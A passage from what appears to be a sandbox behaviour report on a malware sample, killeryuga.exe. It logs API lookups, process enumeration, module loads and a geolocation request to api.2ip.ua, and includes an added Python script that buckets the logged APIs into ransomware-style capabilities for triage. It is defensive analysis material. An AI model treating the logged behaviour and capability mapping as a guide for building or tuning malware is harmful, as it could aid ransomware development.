Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x76b54642 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 202, address_out = 0x76b5fd6b True 1
Get Address c:\windows\syswow64\iphlpapi.dll function = GetAdaptersInfo, address_out = 0x750f9263 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 11, address_out = 0x76b1311b True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76b27673 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 12, address_out = 0x76b1b131 True 1
Get Address c:\windows\syswow64\dnsapi.dll function = DnsFree, address_out = 0x7502436b True 1
Get Address c:\windows\syswow64\dnsapi.dll function = DnsQuery_W, address_out = 0x7503572c True 1
Get Address c:\windows\syswow64\crypt32.dll function = CryptStringToBinaryA, address_out = 0x751d5d77 True 1
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x74e9c544 True 1
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x75364d28 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x753e410b True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x753e4195 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x7536d31f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x7537ee7e True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7761441c True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7763c50e True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7763c381 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x7537f088 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x776205d7 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7763ca24 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x775f0b8c True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x776afde8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x77641e1d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x753e4761 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x753dcd11 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x753e424f True 1
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x753e46b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x753f6676 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x753e4751 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x753f65f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x753e47c1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x753e47e1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x753e47f1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x7537eee0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75461544 True 1
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75461408 True 1
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7546152c True 1
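The table above records the APIs the process resolved through GetProcAddress at run time rather than through its import table, and the names that matter for triage sit among hundreds of CRT and GUI imports: CryptAcquireContextW, CryptImportKey and CryptEncrypt (advapi32); GetLogicalDrives, FindFirstFileW/FindNextFileW and MoveFileW (kernel32); WNetOpenEnumW/WNetEnumResourceW (mpr); the Toolhelp and psapi process-enumeration functions; and the WinINet/DNS functions behind the HTTP session further down. The rows also show a fallback worth recognising: EnumProcesses, EnumProcessModules and GetModuleBaseNameW fail against kernel32.dll (which exports them only under the K32 prefix) and are then resolved from psapi.dll, so those three False rows are not missing APIs. The script below is an added example, not part of the VMRay report or of the sample: it parses rows in this table's format, maps the ordinal imports from ws2_32 and oleaut32 to export names using the fixed ordinals of those two DLLs, buckets the resolved names into capability groups (an analyst's grouping, not something the report defines), and separates genuinely unresolved lookups from DLL fallbacks. SAMPLE_LOG is a subset of rows copied from the table above.

```python
"""Triage helper for a VMRay-style 'Get Address' (GetProcAddress) log.

Added example. SAMPLE_LOG is a subset of rows copied from the report table;
the capability buckets are an analyst's own grouping, not part of the report.
"""
import re
from collections import defaultdict

# One report row: "Get Address <dll path> function = <name|ordinal>, address_out = <hex> <True|False> <count>"
LINE_RE = re.compile(
    r"Get Address (?P<dll>\S+) function = (?P<func>[^,]+), "
    r"address_out = (?P<addr>0x[0-9A-Fa-f]+) (?P<ok>True|False) (?P<count>\d+)"
)

# Fixed, documented export ordinals for the two DLLs the sample imports by number.
ORDINALS = {
    ("ws2_32.dll", "11"): "inet_addr",
    ("ws2_32.dll", "12"): "inet_ntoa",
    ("ws2_32.dll", "52"): "gethostbyname",
    ("oleaut32.dll", "2"): "SysAllocString",
    ("oleaut32.dll", "6"): "SysFreeString",
    ("oleaut32.dll", "8"): "VariantInit",
    ("oleaut32.dll", "9"): "VariantClear",
    ("oleaut32.dll", "12"): "VariantChangeType",
    ("oleaut32.dll", "200"): "GetErrorInfo",
    ("oleaut32.dll", "201"): "SetErrorInfo",
    ("oleaut32.dll", "202"): "CreateErrorInfo",
}

# Analyst-chosen buckets: the resolved names that matter when triaging ransomware/stealer behaviour.
CAPABILITIES = {
    "crypto": {"CryptAcquireContextW", "CryptImportKey", "CryptEncrypt", "CryptCreateHash",
               "CryptHashData", "CryptGetHashParam", "CryptStringToBinaryA"},
    "file_enum": {"GetLogicalDrives", "GetDriveTypeA", "FindFirstFileW", "FindNextFileW",
                  "MoveFileW", "DeleteFileW", "CopyFileW", "CreateSymbolicLinkW"},
    "net_shares": {"WNetOpenEnumW", "WNetEnumResourceW", "WNetCloseEnum"},
    "process_enum": {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW", "OpenProcess",
                     "EnumProcesses", "EnumProcessModules", "GetModuleBaseNameW"},
    "http_dns": {"InternetOpenW", "InternetOpenUrlW", "InternetReadFile", "HttpQueryInfoW",
                 "DnsQuery_W", "gethostbyname", "inet_addr"},
    "services_registry": {"OpenSCManagerW", "OpenServiceW", "ControlService", "RegOpenKeyExW", "RegSetValueExW"},
    "host_fingerprint": {"GetComputerNameW", "GetUserNameW", "GetAdaptersInfo", "UuidCreate"},
    "exec": {"CreateProcessW", "CreateProcessA", "ShellExecuteW", "ShellExecuteExW", "ShellExecuteA"},
}

# Subset of rows copied from the report's Get Address table (not a full listing).
SAMPLE_LOG = r"""
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x75364a5d True 2
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75365371 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75364435 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 2
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75361986 True 1
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptImportKey, address_out = 0x76f5c532 True 1
Get Address c:\windows\syswow64\advapi32.dll function = CryptEncrypt, address_out = 0x76f7779b True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x76b54642 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x76b27673 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75461544 True 1
""".strip().splitlines()


def parse(lines):
    """Yield (dll, function, resolved, count) per row; ordinal imports are mapped to export names."""
    for line in lines:
        m = LINE_RE.search(line)
        if not m:
            continue
        dll = m["dll"].rsplit("\\", 1)[-1].lower()
        func = m["func"].strip()
        if func.isdigit():  # import by ordinal; keep "dll#N" if the ordinal is not in our table
            func = ORDINALS.get((dll, func), f"{dll}#{func}")
        yield dll, func, m["ok"] == "True", int(m["count"])


def triage(lines):
    """Return capability hits, lookups that never resolved anywhere, and kernel32->psapi style fallbacks."""
    resolved_in = defaultdict(set)  # function -> DLLs where the lookup succeeded
    failed_in = defaultdict(set)    # function -> DLLs where the lookup failed
    for dll, func, ok, _count in parse(lines):
        (resolved_in if ok else failed_in)[func].add(dll)
    caps = {cap: sorted(n for n in names if n in resolved_in) for cap, names in CAPABILITIES.items()}
    caps = {cap: hits for cap, hits in caps.items() if hits}
    unresolved = sorted((dll, func) for func, dlls in failed_in.items()
                        if func not in resolved_in for dll in dlls)
    fallbacks = sorted((func, bad, good) for func in failed_in if func in resolved_in
                       for bad in failed_in[func] for good in resolved_in[func])
    return {"capabilities": caps, "unresolved": unresolved, "fallbacks": fallbacks}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```

Feed it the whole Get Address section of a report, one row per line, to get the same summary for every row. The fallback check is what separates an API that is genuinely absent on the analysis OS (SetDefaultDllDirectories and GetCurrentPackageId in this report) from one the sample merely looked up in the wrong module first, which matters when you use "failed GetProcAddress" as a sandbox-evasion or OS-fingerprinting signal.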
System (255)
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-03-24 05:38:58 (UTC) True 1
Get Time type = Ticks, time = 94630 True 1
Get Time type = Performance Ctr, time = 14013587204 True 1
Get Time type = System Time, time = 2019-03-24 05:39:08 (UTC) True 1
Get Time type = Performance Ctr, time = 15114094153 True 1
Get Info type = Hardware Information True 249
Get Info type = Operating System True 1
Environment (2)
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Network Behavior
HTTP Sessions (1)
Information Value
Total Data Sent 467 bytes
Total Data Received 7.25 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.25 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Read Response size = 10240, size_out = 554 True 1
Close Session - True 1
Process #20: killeryuga.exe
Information Value
ID #20
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe" --Service 1416 "xNymGbbmgdkaiGhxWYZyeVFnQDvBkBPf0IgumxuC" BUD0QXFD5xSxqVR1j3D3kK2hZG9mBRMc93aQdsvt
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:03:23, Reason: Child Process
Unmonitor End Time: 00:03:41, Reason: Self Terminated
Monitor Duration 00:00:17
OS Process Information
Information Value
PID 0x7a0
Parent PID 0x588 (c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs 0x7B0, 0x6A4, 0x6A0, 0x33C, 0x6AC, 0x694, 0x698, 0x69C, 0x688
Memory Dumps
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
buffer 0x002B43B0 0x002E3716 Marked Executable - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Forced - 32-bit - False
killeryuga.exe 0x00400000 0x007CCFFF Process Termination - 32-bit - False
Host Behavior
File (6)
Operation Filename Additional Information Success Count Logfile
Open STD_INPUT_HANDLE - True 2
Open STD_OUTPUT_HANDLE - True 2
Open STD_ERROR_HANDLE - True 2
Process (48)
Operation Process Additional Information Success Count Logfile
Enumerate Processes - - True 1
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\conhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Open c:\windows\system32\userinit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\program files (x86)\adobe\reader 10.0\reader\reader_sl.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe desired_access = SYNCHRONIZE True 20
Fn
Module (314)
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x75350000 True 2
Fn
Load RPCRT4.dll base_address = 0x759b0000 True 1
Fn
Load MPR.dll base_address = 0x750d0000 True 1
Fn
Load WININET.dll base_address = 0x75d30000 True 1
Fn
Load WINMM.dll base_address = 0x75090000 True 1
Fn
Load SHLWAPI.dll base_address = 0x77020000 True 1
Fn
Load KERNEL32.dll base_address = 0x75350000 True 1
Fn
Load USER32.dll base_address = 0x75470000 True 1
Fn
Load ADVAPI32.dll base_address = 0x76f50000 True 1
Fn
Load SHELL32.dll base_address = 0x75e30000 True 1
Fn
Load ole32.dll base_address = 0x75bd0000 True 1
Fn
Load OLEAUT32.dll base_address = 0x76b50000 True 1
Fn
Load IPHLPAPI.DLL base_address = 0x750f0000 True 1
Fn
Load WS2_32.dll base_address = 0x76b10000 True 1
Fn
Load DNSAPI.dll base_address = 0x75020000 True 1
Fn
Load CRYPT32.dll base_address = 0x751a0000 True 1
Fn
Load msvcr100.dll base_address = 0x74e80000 True 1
Fn
Load Psapi.dll base_address = 0x75460000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x75350000 True 15
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\ef299c90-595a-4e2e-bacc-9f2c91e89b2a\killeryuga.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x75364f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x75361252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x75364208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x7536359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77610fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77609d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x75365235 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x7538735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x753879f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x7536435f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x753649d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x75361856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x7536186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x75363519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x7537d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x75367a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x75361b00 True 2
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeA, address_out = 0x759f3fc5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringA, address_out = 0x75a2d918 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidToStringW, address_out = 0x759f1ee5 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = RpcStringFreeW, address_out = 0x759d1635 True 1
Fn
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreate, address_out = 0x759cf48b True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetEnumResourceW, address_out = 0x750d3058 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetOpenEnumW, address_out = 0x750d2f06 True 1
Fn
Get Address c:\windows\syswow64\mpr.dll function = WNetCloseEnum, address_out = 0x750d2dd6 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x75d4ab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenW, address_out = 0x75d59197 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlW, address_out = 0x75dabe5c True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x75d4b406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpQueryInfoW, address_out = 0x75d55c75 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenUrlA, address_out = 0x75d730f1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x75d5f18e True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x750926e0 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsW, address_out = 0x770345bf True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7705ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x77033248 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7703bb71 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindExtensionW, address_out = 0x7703a1b9 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendA, address_out = 0x7702d65e True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x770381ef True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocale, address_out = 0x7537ce46 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoW, address_out = 0x75363c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75365223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x753653c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75364435 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x753617d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75365a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x7536103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x7537c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x75364259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x75361136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDrives, address_out = 0x75365371 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x75361282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDriveTypeA, address_out = 0x7537ef75 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = OpenProcess, address_out = 0x75361986 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalAlloc, address_out = 0x7536588e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemDirectoryW, address_out = 0x75365063 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x7536170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryW, address_out = 0x7536492b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x753610ff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x7538830d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FormatMessageW, address_out = 0x75364620 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpynW, address_out = 0x7538d556 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x75361072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReadFile, address_out = 0x75363ed3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x75363f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x75382b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x753633a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75365929 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x7536192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75361700 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x7536469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x7538594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSizeEx, address_out = 0x753659e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x753611c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x753611a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x75361222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileW, address_out = 0x75379af0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x75388baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x7536168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventW, address_out = 0x7536183e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x753614b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x7538896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x7538828e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x75364c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLCID, address_out = 0x75363da5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x75361410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x753689b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x75362d3c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75383102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x75365444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x75382a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetPriorityClass, address_out = 0x7537cf28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75361809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x75363509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x7537174d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x75364950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalFree, address_out = 0x75365558 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x75364467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x753611f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThread, address_out = 0x753634d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryA, address_out = 0x7538d526 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x7537ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x753634b0 True 1
Fn
